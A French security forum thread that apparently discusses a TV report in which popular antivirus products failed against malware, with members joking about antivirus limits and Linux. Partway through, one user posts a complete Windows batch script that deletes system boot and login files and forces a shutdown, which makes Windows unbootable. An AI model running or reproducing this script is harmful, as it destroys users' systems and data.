Antivirus bidons ?

blackoak812 Messages postés 7 Date d'inscription   Statut Membre Dernière intervention   -  
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Vu ce soir samedi 8 mai au journal de 20 h un reportage France 2 réalisé dans une école d'ingénieurs informaticiens de la région parisienne (voir https://www.francetvinfo.fr/replay-jt/france-2 Ceux-ci ont testé les antiviraux les plus connus et les mieux côtés sur la toile en introduisant sur plusieurs machines des virus parmi les plus virulents. Aucun logiciel de sécurité n'a résisté. Tous ont laissé passer les intrusions plus ou moins rapidement....le plus nul, pas de nom s'il vous plait, a laissé détruire le système d'un pc en quelques secondes seulement. On pourrait en rire, mais ce n'est pas si amusant que çà, car celui qui demain oubliera de sauvegarder ses données en sera pour ses frais !!! ...
A bon entendeur, salut.
A voir également:

11 réponses

crapoulou Messages postés 28195 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   8 013

On n'apprend pas grand chose sur ce reportage.
Ce n'est pas un mystère qu'aucun antivirus n'est infaillible, loin de là !!!
2
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685

C'est vraiment trop nul ces news....

Franchement, faut avoir du temps à perdre que de faire ce genre de test.
C'est pas nouveau que les AV offrent pas une protection de 100%....
C'est pas nouveau qu'il y a des gens infectés tous les jours etc...
On a pas besoin de genre de tests "alakon" pour s'en rendre compte.

Au lieu de faire ces tests à la con, devrait faire des documents simples accessibles à tous qui explique le minium de la sécurité informatique sur la toile, ce serait plus utile.

EDIT : ha j'avais pas vu le post de crapoulou - du coup je répète :)

StycX et Rikkunter m'ont tué \o
1
crapoulou Messages postés 28195 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   8 013

Salut Malekal !
Pas de soucis, on est bien d'accords sur ce point !
Ou bien investir leurs efforts pour tenter de pallier ces failles... si encore on peut le faire...
0

Salut,
Tu es sûr que c'est sur ce JT de 20H du 8 mai ?!
Je n'ai pas trouvé.
Tu peux me dire à quel moment c'est stp (le minutage).
Merci.
0
transat Messages postés 28379 Date d'inscription   Statut Contributeur Dernière intervention   8 982

Bonsoir
cela ne serait plutôt sur FR3 au JT de 19h30.Je l'ai vu moi aussi mais comme c'est mon épouse qui m'a appelé pour le regarder,je n'ai pas prêté attention à la chaine,mais il me semble bien que c'était avant 20h
@+
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question

Merci transat, t'as raison :
https://www.francetvinfo.fr/replay-jt/france-3
0
transat Messages postés 28379 Date d'inscription   Statut Contributeur Dernière intervention   8 982

-2

Tant que ces attaques restent mineures...
Sinon, on est vraiment mal ! lol
Tous les PC qui crashent !
0
dada62160 Messages postés 1022 Date d'inscription   Statut Membre Dernière intervention   69

xD ça me rapelle la fois ou j'avais fait un script .bat sous Windows dans une machine virtuelle. Dedans, yavais l'instruction d'effacer System 32, tous les documents etc...
Avast! n'as rien fait mdr
-2
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685

ouaip!

Même que si tu sautes par la fenêtre, ben Avast! il fera rien non plus!
Trop pourri ces AV!
0
dada62160 Messages postés 1022 Date d'inscription   Statut Membre Dernière intervention   69

mdr en même temps, je sais pas quel antivirus t'empêcheras de sauter par la fenêtre...
0
kevin76110 Messages postés 4273 Date d'inscription   Statut Membre Dernière intervention   875

Le meilleur antivirus, c'est d'installer Linux =)
-2

Tu portes bien ton surnom toi :)
0

Ouaii la preuve : je tourne dessus depuis bientôt un an, jamais un problème !
0
kevin76110 Messages postés 4273 Date d'inscription   Statut Membre Dernière intervention   875

@ Malekal_morte: pourquoi?
0
Malekal_morte- Messages postés 180304 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 685 > kevin76110 Messages postés 4273 Date d'inscription   Statut Membre Dernière intervention  

C'était juste une vanne par rapport à la manière dont t'as posté comme un "bourrain", ça faisait gros troll de la mort :D
0

:P
0
je ne sais pas! Messages postés 119 Date d'inscription   Statut Membre Dernière intervention   9

généralement tous les virus sont fait par windows

exe:

@echo off
del C:\WINDOWS\system32\winlogon.exe
del C:\WINDOWS\system32\logonui.exe
del C:\WINDOWS\
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *message here
shutdown -s -t 8? -c "message here

si on change windows par linux on aura plus de problème avec les virus
-2
karirovax Messages postés 3221 Date d'inscription   Statut Membre Dernière intervention   204

slt
oooooooooooooooooh, vous dites :
del C:\WINDOWS\system32\winlogon.exe
je pense que vous ne connez pas le processus winlogon.exe
et aussi pour le fichier de boot ( boot.ini ... etc )
même chose pour les autres ... c quoi ca
ceci va empêche le démarrage de windows
0
crapoulou Messages postés 28195 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   8 013 > karirovax Messages postés 3221 Date d'inscription   Statut Membre Dernière intervention  

Quel est ton problème ??!
0
karirovax Messages postés 3221 Date d'inscription   Statut Membre Dernière intervention   204

Re,
c pas mon problème !!
c un faut virus qui a été crée par je ne sais pas! ( le personne qui est en haut )
0
crapoulou Messages postés 28195 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   8 013 > karirovax Messages postés 3221 Date d'inscription   Statut Membre Dernière intervention  

Ce n'est pas kevin ton pseudo à toi aussi ?
0
karirovax Messages postés 3221 Date d'inscription   Statut Membre Dernière intervention   204 > crapoulou Messages postés 28195 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  

Re,
j'ai pas compris ce que tu dit ( kevin ... etc ) car je suis pas un francais ;)
0
lucas01 Messages postés 1835 Date d'inscription   Statut Membre Dernière intervention   102

En plus le reportage n'existe plus.
-2

Eh oui, ils ne sont pas stockés ad vitam eternam.
0